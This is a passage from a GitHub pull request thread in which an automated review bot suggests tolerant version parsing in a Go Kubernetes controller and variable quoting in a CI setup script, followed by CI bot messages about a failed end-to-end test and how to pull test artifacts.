+		log.FromContext(ctx).Info("Unparseable app.kubernetes.io/version, skipping v0.7 scheduler migrations", "version", version, "error", err.Error())
+		return nil
 	}
 	if v.Compare(*semver.New("0.7.0")) < 0 {
 		return nil
 	}
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
func schedulerTransform(ctx context.Context, d *appsv1.Deployment) error {
	version, ok := d.Spec.Template.Annotations["app.kubernetes.io/version"]
	if !ok || version == "" {
		version = "0.0.0"
	}
	v, err := semver.NewVersion(version)
	if err != nil {
		return fmt.Errorf("failed to parse version %q: %w", version, err)
	}
	if v.Compare(*semver.New("0.7.0")) < 0 {
		return nil
	}

func schedulerTransform(ctx context.Context, d *appsv1.Deployment) error {
	version, ok := d.Spec.Template.Annotations["app.kubernetes.io/version"]
	if !ok || version == "" {
		version = "0.0.0"
	}
	v, err := semver.NewVersion(strings.TrimPrefix(version, "v"))
	if err != nil {
		log.FromContext(ctx).Info("Unparseable app.kubernetes.io/version, skipping v0.7 scheduler migrations", "version", version, "error", err.Error())
		return nil
	}
	if v.Compare(*semver.New("0.7.0")) < 0 {
		return nil
	}
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha2/llmisvc/scheduler.go` around lines 1111 - 1122,
schedulerTransform currently fails reconciliation when the
app.kubernetes.io/version annotation is non-strict SemVer; instead, sanitize and
tolerate common formats: in schedulerTransform trim a leading "v" (and
whitespace) from d.Spec.Template.Annotations["app.kubernetes.io/version"] before
calling semver.NewVersion, and if semver.NewVersion still returns an error, log
the parse failure and set version to "0.0.0" (do not return the error) so
expectedSchedulerDeployment/reconcileSchedulerDeployment continue reconciling;
ensure log messages include the raw annotation and the fallback decision for
debugging.

Comment on lines +110 to +121
if [[ $LLMISVC_AUTOSCALER == "hpa" ]]; then
echo "Installing LLMISVC HPA autoscaling components (Prometheus, Prometheus Adapter, WVA)..."
${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh
${REPO_ROOT}/hack/setup/infra/manage.prometheus-adapter-helm.sh
${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh

elif [[ $LLMISVC_AUTOSCALER == "keda" ]]; then
echo "Installing LLMISVC KEDA autoscaling components (Prometheus, KEDA, WVA)..."
${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh
${REPO_ROOT}/hack/setup/infra/manage.keda-helm.sh
${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh
fi

🛠️ Refactor suggestion | 🟠 Major

Quote ${REPO_ROOT} expansions in the new autoscaler invocations.

Shellcheck SC2086 flags lines 112–114 and 118–120. If REPO_ROOT ever resolves to a path with whitespace or glob metachars, word splitting will break the invocation. As per coding guidelines (**/*.sh: "Quote all variables to prevent injection").
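The failure mode SC2086 warns about is easy to reproduce. The snippet below uses a throwaway directory with a space in its name (purely illustrative; not a path from this repo) to show the unquoted expansion breaking while the quoted one works:

```shell
#!/usr/bin/env bash
set -uo pipefail

# Hypothetical repo root containing a space, to trigger word splitting.
REPO_ROOT="$(mktemp -d)/repo root"
mkdir -p "${REPO_ROOT}/hack"
printf '#!/usr/bin/env bash\necho ok\n' > "${REPO_ROOT}/hack/manage.sh"
chmod +x "${REPO_ROOT}/hack/manage.sh"

# Unquoted: the expansion splits into two words, so bash tries to run
# ".../repo" with the argument "root/hack/manage.sh" and fails.
if ${REPO_ROOT}/hack/manage.sh 2>/dev/null; then
  echo "unquoted: ran"
else
  echo "unquoted: failed due to word splitting"
fi

# Quoted: the whole path is a single word and the script runs.
"${REPO_ROOT}/hack/manage.sh"
```

The same reasoning applies to every `${REPO_ROOT}` invocation in the diff below.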

🔧 Proposed fix
   if [[ $LLMISVC_AUTOSCALER == "hpa" ]]; then
     echo "Installing LLMISVC HPA autoscaling components (Prometheus, Prometheus Adapter, WVA)..."
-    ${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh
-    ${REPO_ROOT}/hack/setup/infra/manage.prometheus-adapter-helm.sh
-    ${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh
+    "${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh"
+    "${REPO_ROOT}/hack/setup/infra/manage.prometheus-adapter-helm.sh"
+    "${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh"

   elif [[ $LLMISVC_AUTOSCALER == "keda" ]]; then
     echo "Installing LLMISVC KEDA autoscaling components (Prometheus, KEDA, WVA)..."
-    ${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh
-    ${REPO_ROOT}/hack/setup/infra/manage.keda-helm.sh
-    ${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh
+    "${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh"
+    "${REPO_ROOT}/hack/setup/infra/manage.keda-helm.sh"
+    "${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh"
   fi
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
  if [[ $LLMISVC_AUTOSCALER == "hpa" ]]; then
    echo "Installing LLMISVC HPA autoscaling components (Prometheus, Prometheus Adapter, WVA)..."
    ${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh
    ${REPO_ROOT}/hack/setup/infra/manage.prometheus-adapter-helm.sh
    ${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh
  elif [[ $LLMISVC_AUTOSCALER == "keda" ]]; then
    echo "Installing LLMISVC KEDA autoscaling components (Prometheus, KEDA, WVA)..."
    ${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh
    ${REPO_ROOT}/hack/setup/infra/manage.keda-helm.sh
    ${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh
  fi

  if [[ $LLMISVC_AUTOSCALER == "hpa" ]]; then
    echo "Installing LLMISVC HPA autoscaling components (Prometheus, Prometheus Adapter, WVA)..."
    "${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh"
    "${REPO_ROOT}/hack/setup/infra/manage.prometheus-adapter-helm.sh"
    "${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh"
  elif [[ $LLMISVC_AUTOSCALER == "keda" ]]; then
    echo "Installing LLMISVC KEDA autoscaling components (Prometheus, KEDA, WVA)..."
    "${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh"
    "${REPO_ROOT}/hack/setup/infra/manage.keda-helm.sh"
    "${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh"
  fi
🧰 Tools
🪛 Shellcheck (0.11.0)

[info] 112-112: Double quote to prevent globbing and word splitting.

(SC2086)


[info] 113-113: Double quote to prevent globbing and word splitting.

(SC2086)


[info] 114-114: Double quote to prevent globbing and word splitting.

(SC2086)


[info] 118-118: Double quote to prevent globbing and word splitting.

(SC2086)


[info] 119-119: Double quote to prevent globbing and word splitting.

(SC2086)


[info] 120-120: Double quote to prevent globbing and word splitting.

(SC2086)

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@test/scripts/gh-actions/setup-deps.sh` around lines 110 - 121, The shell
invocations using ${REPO_ROOT} (e.g., calls to manage.prometheus-helm.sh,
manage.prometheus-adapter-helm.sh, manage.wva-helm.sh, and manage.keda-helm.sh)
are unquoted and trigger ShellCheck SC2086; update each invocation to quote the
variable so the commands use
"${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh" (and likewise for
manage.prometheus-adapter-helm.sh, manage.wva-helm.sh, manage.keda-helm.sh) to
prevent word-splitting or glob expansion if REPO_ROOT contains spaces or
metacharacters.

@rhods-ci-bot

@vivekk16: The following test has Failed:

OCI Artifact Browser URL

View in Artifact Browser

Inspecting Test Artifacts Manually

To inspect your test artifacts manually, follow these steps:

  1. Install ORAS (see the ORAS installation guide).
  2. Download artifacts with the following commands:
mkdir -p oras-artifacts
cd oras-artifacts
oras pull quay.io/opendatahub/odh-ci-artifacts:kserve-group-test-9rr7z

@openshift-ci

openshift-ci Bot commented Apr 24, 2026

@vivekk16: The following test failed, say /retest to rerun all failed tests or /retest-required to rerun all mandatory failed tests:

| Test name | Commit | Details | Required | Rerun command |
| --- | --- | --- | --- | --- |
| ci/prow/e2e-llm-inference-service | e094d85 | link | true | /test e2e-llm-inference-service |

Full PR test history. Your PR dashboard.

Details

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository. I understand the commands that are listed here.

